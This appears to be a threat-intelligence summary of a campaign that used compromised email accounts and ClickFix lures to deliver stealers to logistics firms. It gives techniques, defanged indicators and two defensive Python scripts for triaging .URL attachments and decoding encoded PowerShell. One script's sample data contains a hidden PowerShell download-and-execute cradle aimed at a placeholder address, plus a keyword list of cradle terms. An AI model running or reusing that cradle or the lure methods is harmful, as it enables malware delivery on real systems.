Security Brief: Cyber Actor Targets Transport and Logistics Firms with Malware via Compromised Accounts and Tailored Social Engineering

Proofpoint researchers monitor a cluster of activity targeting transportation and logistics firms in North America, delivering multiple malware payloads via compromised email accounts and carefully crafted social engineering. The actors impersonate transport software and use techniques like Google Drive links, .URL attachments, SMB-based delivery, and the new “ClickFix” method to entice victims to run malicious code. #LummaStealer #StealC #DanaBot #Arechclient2 #Samsara #AMBLogistic #AstraTMS #ClickFix

Key points

  • Targets are transportation and logistics companies in North America.
  • Attacks rely on compromised legitimate email accounts to deliver malware.
  • Malware payloads include Lumma Stealer, StealC, NetSupport, DanaBot, and Arechclient2.
  • Initial access and delivery methods have evolved since May 2024.
  • Campaigns frequently use Google Drive URLs or .URL file attachments.
  • The new technique “ClickFix” delivers malware via Base64-encoded PowerShell scripts.
  • Threat actors impersonate legitimate freight/fleet software; no single actor attribution yet.
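The brief notes that some lures arrive as .URL file attachments whose target is a remote share reached over SMB. Defenders can triage such attachments before they ever reach a user, because a Windows Internet Shortcut is plain INI text with a single `URL=` key. The following is an added example written for this summary, not code from Proofpoint or from the brief: it parses the `[InternetShortcut]` section and flags targets that are `file://` URLs with a remote host or raw UNC paths, which both resolve over SMB. The sample attachments and the 198.51.100.7 host are constructed (TEST-NET-2), and the verdict labels are this example's own.

```python
import os
from urllib.parse import urlparse

# Constructed .URL attachments for this example (not files from the campaign).
# Windows Internet Shortcut files are INI text; the host below is a TEST-NET-2 address.
SAMPLE_ATTACHMENTS = {
    "portal.url": "[InternetShortcut]\r\nURL=https://www.example.com/portal\r\n",
    "rate_confirmation.url": (
        "[InternetShortcut]\r\n"
        "URL=file://198.51.100.7/share/rate_confirmation.exe\r\n"
        "IconIndex=1\r\n"
    ),
    "invoice.url": (
        "[InternetShortcut]\n"
        "URL=\\\\198.51.100.7\\share\\invoice.lnk\n"
        "IconFile=%SystemRoot%\\system32\\shell32.dll\n"
    ),
}

# File types that execute or chain to execution when opened from a share.
EXECUTABLE_EXTENSIONS = {".exe", ".vbs", ".js", ".bat", ".cmd", ".ps1", ".msi", ".lnk", ".hta", ".scr"}


def parse_url_file(text):
    """Return the URL= value from the [InternetShortcut] section, or None if absent."""
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].lower()
        elif section == "internetshortcut":
            key, sep, value = line.partition("=")
            if sep and key.strip().lower() == "url":
                return value.strip()
    return None


def remote_share_host(target):
    """Host of a UNC (\\\\host\\share) or file://host/ target, i.e. one fetched over SMB; else None."""
    if target.startswith("\\\\") or target.startswith("//"):
        parts = target.replace("\\", "/").lstrip("/").split("/", 1)
        return parts[0] or None
    parsed = urlparse(target)
    # file:// with a host component (not a local drive) is resolved by Windows as a UNC share.
    if parsed.scheme == "file" and parsed.netloc:
        return parsed.netloc
    return None


def assess_url_file(text):
    """Classify one .URL attachment as 'benign', 'suspicious', 'smb_delivery' or 'unparsed'."""
    target = parse_url_file(text)
    if target is None:
        return {"verdict": "unparsed", "target": None, "host": None, "reasons": []}
    reasons = []
    host = remote_share_host(target)
    if host:
        reasons.append(f"target resolves over SMB to a remote share on {host}")
    ext = os.path.splitext(target.replace("\\", "/"))[1].lower()
    if ext in EXECUTABLE_EXTENSIONS:
        reasons.append(f"target is an executable type ({ext})")
    if host:
        verdict = "smb_delivery"
    elif reasons:
        verdict = "suspicious"
    else:
        verdict = "benign"
    return {"verdict": verdict, "target": target, "host": host, "reasons": reasons}


def triage_attachments(attachments):
    """Run assess_url_file over a {filename: contents} mapping."""
    return {name: assess_url_file(text) for name, text in attachments.items()}


if __name__ == "__main__":
    for name, result in triage_attachments(SAMPLE_ATTACHMENTS).items():
        print(f"{name}: {result['verdict']}  {'; '.join(result['reasons'])}")
```

The host extracted by `remote_share_host` is the value worth acting on: it is the address the victim workstation would open an SMB session to, so it belongs on the egress block list alongside the URL indicators the brief publishes.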

MITRE Techniques

  • [T1078] Initial Access – Use of compromised email accounts to gain access to legitimate conversations. “The actor injects malicious content into existing conversations within the account’s inbox, which makes the messages look legitimate. Proofpoint has identified at least 15 compromised email accounts used during these campaigns.”
  • [T1059.001] Execution – Execution of Base64-encoded PowerShell scripts via the “ClickFix” technique. “The messages contained URLs which directed users through various dialogue boxes leading them to copy, paste, and run a Base64 encoded PowerShell script contained within the HTML, a technique called ‘ClickFix.’”
  • [T1136] Persistence – Malware installation through remote shares using SMB. “If executed, it uses SMB to access an executable from the remote share, which installs the malware.”
  • [T1071] Command and Control – Use of URLs leading to malicious payloads hosted on compromised servers.
  • [T1041] Exfiltration – Potential data theft via malware like Lumma Stealer and StealC.
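The ClickFix step leaves a distinctive trace: the user pastes a `powershell -EncodedCommand` line into the Run dialog, so explorer.exe spawns PowerShell with a Base64 argument that decodes to a download-and-execute one-liner. The block below is an added example for this summary, not Proofpoint's code or telemetry: it scans constructed process-creation records, finds any prefix form of the `-EncodedCommand` switch (`-e`, `-enc`, `-EncodedCommand`), decodes the UTF-16LE Base64 payload, and scores it for download-cradle keywords. The record format (pipe-separated key=value), the sample commands, the 203.0.113.5 address (TEST-NET-3) and the verdict names are all this example's own.

```python
import base64
import binascii


def encode_ps(script):
    """Encode a script the way PowerShell's -EncodedCommand expects: UTF-16LE, then Base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed process-creation records (not real telemetry). Record 2 mimics the ClickFix flow:
# explorer.exe (the Run dialog) launching PowerShell with a pasted Base64 payload.
SAMPLE_LOGS = [
    "ParentImage=C:\\Windows\\explorer.exe"
    "|Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "|CommandLine=powershell -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1",
    "ParentImage=C:\\Windows\\explorer.exe"
    "|Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "|CommandLine=powershell -w hidden -nop -enc "
    + encode_ps("$u='http://203.0.113.5/update.txt'; iex (iwr $u -UseBasicParsing)"),
    "ParentImage=C:\\Windows\\System32\\svchost.exe"
    "|Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "|CommandLine=powershell -EncodedCommand "
    + encode_ps("Get-Date | Out-File C:\\temp\\ts.txt"),
]

# Substrings that mark a decoded payload as a download/execute cradle (matched case-insensitively).
INDICATORS = ("iex", "invoke-expression", "downloadstring", "downloadfile",
              "invoke-webrequest", "iwr", "frombase64string", "http://", "https://")


def parse_record(line):
    """Split 'Key=Value|Key=Value' into a dict (values may themselves contain '=')."""
    return dict(field.partition("=")[::2] for field in line.split("|"))


def extract_encoded_command(command_line):
    """Return the Base64 argument after an -EncodedCommand switch, accepting any prefix (-e, -enc, ...)."""
    tokens = command_line.split()
    for i, tok in enumerate(tokens[:-1]):
        if tok[:1] in "-/" and len(tok) > 1 and "encodedcommand".startswith(tok[1:].lower()):
            return tokens[i + 1].strip("'\"")
    return None


def decode_encoded_command(b64):
    """Decode the payload as PowerShell does; None if it is not valid Base64/UTF-16LE."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None


def analyse_record(line):
    """Decode any encoded command in one record and classify it."""
    rec = parse_record(line)
    b64 = extract_encoded_command(rec.get("CommandLine", ""))
    if b64 is None:
        return {"verdict": "no_encoded_command", "decoded": None, "indicators": []}
    decoded = decode_encoded_command(b64)
    if decoded is None:
        return {"verdict": "undecodable", "decoded": None, "indicators": []}
    hits = [ind for ind in INDICATORS if ind in decoded.lower()]
    parent = rec.get("ParentImage", "").lower()
    # A cradle launched from explorer.exe matches the Run-dialog paste that ClickFix relies on.
    if hits and parent.endswith("\\explorer.exe"):
        verdict = "clickfix_suspect"
    elif hits:
        verdict = "encoded_download_cradle"
    else:
        verdict = "encoded_benign_content"
    return {"verdict": verdict, "decoded": decoded, "indicators": hits}


def analyse_logs(lines):
    return [analyse_record(line) for line in lines]


if __name__ == "__main__":
    for result in analyse_logs(SAMPLE_LOGS):
        print(result["verdict"], "|", result["decoded"])
```

Decoding rather than alerting on the bare `-enc` switch matters: administrators and software installers use encoded commands legitimately (record 3 above), so the decision should rest on what the payload does and on the explorer.exe parent, not on the encoding itself.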

Indicators of Compromise

  • [SHA256] File hashes – 199d6f70f10c259ee09e99e6f1d7f127426999a0ed20536f2662842cd12b5431, ac49ff207e319f79bbd9c80d044d621920d1340f4c53e5e4da39b2a0c758634e, and other hashes
  • [URL] Payload URLs – hxxp://89[.]23[.]98[.]98/file/ratecon.exe, hxxp://89[.]23[.]98[.]98/file/rate_confirmation.vbs, and other URLs
  • [URL] Domains and hosting – live-samsaratrucking[.]com/true-tracking-32934.html, ambccm[.]com/3.msi, ambcrrm[.]com/3.msi
  • [Filename] Observed payload names – Rateconfirm.exe, carrier.exe, remittance.exe, information_package.exe, 14242.exe

Read more: https://www.proofpoint.com/us/blog/threat-insight/security-brief-actor-uses-compromised-accounts-customized-social-engineering